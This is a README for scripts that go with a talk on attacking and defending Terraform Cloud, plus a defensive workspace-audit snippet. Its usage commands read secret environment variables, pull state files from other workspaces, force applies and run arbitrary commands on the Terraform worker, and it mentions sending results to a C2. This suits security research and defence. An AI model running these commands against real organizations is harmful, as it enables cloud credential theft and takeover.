This repository contains scripts to demonstrate the vulnerabilities shown in our associated talk: Attacking and Defending Infrastructure with Terraform: How we got admin across cloud environments.
There are two scenarios where you can use these scripts:
- When you don't have access to TFC/TFE, or you don't have a token, but you can create a PR to a GitHub repository linked to TFC/TFE and speculative plans are run automatically.
- When you have access to a Terraform Cloud workspace and a valid token for it.
For the first scenario (PR access only), use the script: PR_attack.py.
Note: You still need access to TFC in order to read the output of the attacks. But an attacker could also execute arbitrary commands and exfiltrate the results to a C2 they control.
Access the secrets from the environment variables.
```bash
python3 PR_attack.py \
  --repo "git@github.com:CryptoExchangeCo/website.git" \
  --folder "dev" \
  --get_envs
```
Get the state file for the current workspace.
```bash
python3 PR_attack.py \
  --repo "git@github.com:CryptoExchangeCo/website.git" \
  --folder "dev" \
  --get_state_file
```
Get the state file for a different workspace in the same organization.
```bash
python3 PR_attack.py \
  --repo "git@github.com:CryptoExchangeCo/website.git" \
  --folder "dev" \
  --get_state_file_from_workspace "website_prod"
```
Perform an apply on plan using a tf file as input.
```bash
python3 PR_attack.py \
  --repo "git@github.com:CryptoExchangeCo/website.git" \
  --folder "dev" \
  --apply_on_plan "templates/s3_bucket.tf"
```
Execute an arbitrary command in the TF worker.
```bash
python3 PR_attack.py \
  --repo "git@github.com:CryptoExchangeCo/website.git" \
  --folder "dev" \
  --exec_command "id;env;hostname"
```
For the second scenario (valid token), use the script: TF_attack.py.
The usage is very similar to the previous scenario. To retrieve secrets from environment variables, run:
```bash
python3 TF_attack.py \
  --hostname "app.terraform.io" \
  --organization "CryptoExchangeCo" \
  --workspace "website_dev" \
  --get_envs
```
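From the defender's side, an added example (not part of this repository's scripts): a small audit that flags workspace settings tied to the two exposures described above, namely speculative plans that run automatically on a VCS-linked workspace and state that other workspaces in the organization can read. The attribute names `speculative-enabled`, `global-remote-state` and `vcs-repo` follow the Terraform Cloud workspaces API; the function name, finding labels and sample response are constructed for illustration.

```python
import json

# Constructed sample shaped like a Terraform Cloud "list workspaces" API
# response (JSON:API). Values are illustrative, not real data.
SAMPLE_RESPONSE = json.dumps({"data": [
    {"type": "workspaces", "attributes": {
        "name": "website_dev",
        "speculative-enabled": True,
        "global-remote-state": True,
        "vcs-repo": {"identifier": "CryptoExchangeCo/website"}}},
    {"type": "workspaces", "attributes": {
        "name": "website_prod",
        "speculative-enabled": False,
        "global-remote-state": False,
        "vcs-repo": {"identifier": "CryptoExchangeCo/website"}}},
    {"type": "workspaces", "attributes": {
        "name": "sandbox",              # CLI-driven, no repository linked
        "speculative-enabled": True,
        "global-remote-state": True,
        "vcs-repo": None}},
]})


def audit_workspaces(response_text):
    """Return (workspace_name, finding) pairs for settings worth reviewing."""
    findings = []
    for item in json.loads(response_text).get("data", []):
        attrs = item.get("attributes", {})
        name = attrs.get("name", "<unnamed>")
        vcs_linked = bool(attrs.get("vcs-repo"))
        # Assumption: a missing key is treated as enabled, so it gets reviewed.
        if vcs_linked and attrs.get("speculative-enabled", True):
            # A pull request to the linked repository triggers a plan run.
            findings.append((name, "speculative-plans-on-pr"))
        if attrs.get("global-remote-state"):
            # State is readable from every workspace in the organization.
            findings.append((name, "state-shared-org-wide"))
    return findings


if __name__ == "__main__":
    for workspace, finding in audit_workspaces(SAMPLE_RESPONSE):
        print(f"{workspace}: {finding}")
```

To run it against a real organization, save the workspace list returned by the API with a read-only token and pass the file contents to `audit_workspaces`.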

